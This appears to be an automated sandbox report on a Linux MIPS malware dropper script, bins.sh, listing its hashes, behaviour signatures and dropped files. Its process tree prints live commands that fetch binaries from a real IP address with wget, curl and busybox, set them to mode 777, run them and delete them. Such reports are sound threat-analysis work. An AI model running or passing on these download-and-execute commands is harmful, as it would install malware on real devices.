Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    27-10-2024 20:58

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    dbb43f362c91c1a79b8656e0ca23f39b

  • SHA1

    15e807ece2b9c17b0d6592aa1a35166dfe525bb9

  • SHA256

    a5d00471e4903988f4d09563ee3cad4dba92df4fbd6cae9d1b2ffb9ac8538747

  • SHA512

    cd1182e280fca2287bab8b4c22bb0547001984e0bb1ac54d9ca835ab492171fbb029824bb509d7e7bc89a9a4bd149e5878697f512ebcb50eacc25363e63d6337

  • SSDEEP

    192:8E3WGpEx79Q888Y8uBpzGL3UltItlWfjIyvCL3Ultq888Y8uBpEtlWfjyrE37x7+:8jGpEx79Q888Y8uBpzatlWfjIyvE888Z

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 6 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 6 IoCs
  • Reads runtime system information 7 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:697
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:702
        • /usr/bin/wget
          wget http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
          • Writes file to tmp directory
          PID:704
        • /usr/bin/curl
          curl -O http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:715
        • /bin/busybox
          /bin/busybox wget http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
          • Writes file to tmp directory
          PID:726
        • /bin/chmod
          chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
          • File and Directory Permissions Modification
          PID:727
        • /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          ./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
          • Executes dropped EXE
          PID:729
        • /bin/rm
          rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
            PID:731
          • /usr/bin/wget
            wget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
            2⤵
            • Writes file to tmp directory
            PID:732
          • /usr/bin/curl
            curl -O http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:733
          • /bin/busybox
            /bin/busybox wget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
            2⤵
            • Writes file to tmp directory
            PID:734
          • /bin/chmod
            chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
            2⤵
            • File and Directory Permissions Modification
            PID:735
          • /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
            ./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
            2⤵
            • Executes dropped EXE
            PID:736
          • /bin/rm
            rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
            2⤵
              PID:738
            • /usr/bin/wget
              wget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
              2⤵
              • Writes file to tmp directory
              PID:739
            • /usr/bin/curl
              curl -O http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:740
            • /bin/busybox
              /bin/busybox wget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
              2⤵
              • Writes file to tmp directory
              PID:746
            • /bin/chmod
              chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
              2⤵
              • File and Directory Permissions Modification
              PID:755
            • /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
              ./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
              2⤵
              • Executes dropped EXE
              PID:757
            • /bin/rm
              rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
              2⤵
                PID:760
              • /usr/bin/wget
                wget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
                2⤵
                • Writes file to tmp directory
                PID:761
              • /usr/bin/curl
                curl -O http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
                2⤵
                • Reads runtime system information
                • Writes file to tmp directory
                PID:769
              • /bin/busybox
                /bin/busybox wget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
                2⤵
                • Writes file to tmp directory
                PID:784
              • /bin/chmod
                chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
                2⤵
                • File and Directory Permissions Modification
                PID:792
              • /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
                ./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
                2⤵
                • Executes dropped EXE
                PID:793
              • /bin/rm
                rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
                2⤵
                  PID:797
                • /usr/bin/wget
                  wget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
                  2⤵
                  • Writes file to tmp directory
                  PID:799
                • /usr/bin/curl
                  curl -O http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
                  2⤵
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:802
                • /bin/busybox
                  /bin/busybox wget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
                  2⤵
                  • Writes file to tmp directory
                  PID:833
                • /bin/chmod
                  chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
                  2⤵
                  • File and Directory Permissions Modification
                  PID:834
                • /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
                  ./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
                  2⤵
                  • Executes dropped EXE
                  PID:835
                • /bin/rm
                  rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
                  2⤵
                    PID:837
                  • /usr/bin/wget
                    wget http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
                    2⤵
                    • Writes file to tmp directory
                    PID:838
                  • /usr/bin/curl
                    curl -O http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
                    2⤵
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:840
                  • /bin/busybox
                    /bin/busybox wget http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
                    2⤵
                    • Writes file to tmp directory
                    PID:841
                  • /bin/chmod
                    chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
                    2⤵
                    • File and Directory Permissions Modification
                    PID:842
                  • /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
                    ./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
                    2⤵
                    • Executes dropped EXE
                    PID:843
                  • /bin/rm
                    rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
                    2⤵
                      PID:845
                    • /usr/bin/wget
                      wget http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
                      2⤵
                      • Writes file to tmp directory
                      PID:846
                    • /usr/bin/curl
                      curl -O http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
                      2⤵
                      • Reads runtime system information
                      • Writes file to tmp directory
                      PID:847

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs

                    Filesize

                    80KB

                    MD5

                    22c527269cbd9b42f4ade79f52757efb

                    SHA1

                    c2456188a49af93b0d07af2a7cc1346d5be510bd

                    SHA256

                    100042d7138b4348a13c54c191d501d125b7fea7631382e7d0e9d7251057ce97

                    SHA512

                    7b7cb4d8307c0437163cdbfa349f1285cfa26c25ec856f8b4d4cebf8f71cae87e74de8f3c0f29ef2789168a4499bfe95007d7d524ed734e3eb4ac0d0e4e09b53

                  • /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB

                    Filesize

                    108KB

                    MD5

                    c97a9c55ddb153e8bfce38f201d2cffb

                    SHA1

                    3970452f27327f98c2e3fdcabf0390067b48bd62

                    SHA256

                    138a80e023ab0bbb8b2259cf3633c94c39e6f68df2be2ad01ef08590249e662c

                    SHA512

                    1734a2e256f90d99d73c70d0faa5b3d24d39a2e9a60dec0c138e75ae0e1793edafb408e1f2aaa2692f40265183faea1d4141b271fb67543633a412817f9fd11e

                  • /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms

                    Filesize

                    100KB

                    MD5

                    3b78bb645b81d600c30713d416f666be

                    SHA1

                    23796112f2cce2afb2217498b5ecf2801ab550f2

                    SHA256

                    d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2

                    SHA512

                    9532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9

                  • /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S

                    Filesize

                    93KB

                    MD5

                    27a1a1941f224eff6a4babf2495e3692

                    SHA1

                    86fae66a698f6280353e470ffadfb64441b03e83

                    SHA256

                    ab610b9f57ce293287cf9d4b3d47024ee73c81d8542247e26d1f0db2d5144179

                    SHA512

                    cf02927d9313f43ab5d04c7570b71cd722a5772642eac72feccdf4612985e29b399a7bbdff5de65d352b92f168c6934b0f0851a28c58a4814fffe38a0d884934

                  • /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S

                    Filesize

                    16KB

                    MD5

                    3f09ed0dc221d87bcd4142a92974214b

                    SHA1

                    c8cc6d8a719b0b512aad6911e67bdb3b0ba74db9

                    SHA256

                    47e23b4fdc7349f56feb4f333cbb2aacb644b9eb9dd82f7c6efffdab7518cb61

                    SHA512

                    426ac9d8b24e6c318593a0ece8fe174a01f863fb0c6557f584de3c28283310c56d279b46a16669bfecc881a46dff7975cdf50b9d754684f556f15ca5e8c17a65

                  • /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa

                    Filesize

                    122KB

                    MD5

                    aadb8cc4b6eac7fce760c09262693884

                    SHA1

                    b55178ff3605f4bbfc9286d4c8ac445673232217

                    SHA256

                    b254f9a6df1e7aae5181abf014b9d574c959ab71bdfd3a2b21022446c583d843

                    SHA512

                    5567998215fc9389efeb34ee57e59db4141044bbb1f06cac365565681226836b515c8c8cc17931e72e71d4240a5f433aebb8dfe67b2463ef800f59c86561a62c

                  • /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF

                    Filesize

                    101KB

                    MD5

                    8d0f8d45165dc1f3ba334ce75be39621

                    SHA1

                    1d5baece9d5af3885276735c3c20d28e161e00ff

                    SHA256

                    17441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791

                    SHA512

                    a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7

                  • /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt

                    Filesize

                    101KB

                    MD5

                    a7e686eb3f74b104a5520f08cfd54eb5

                    SHA1

                    58b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b

                    SHA256

                    617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07

                    SHA512

                    2767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df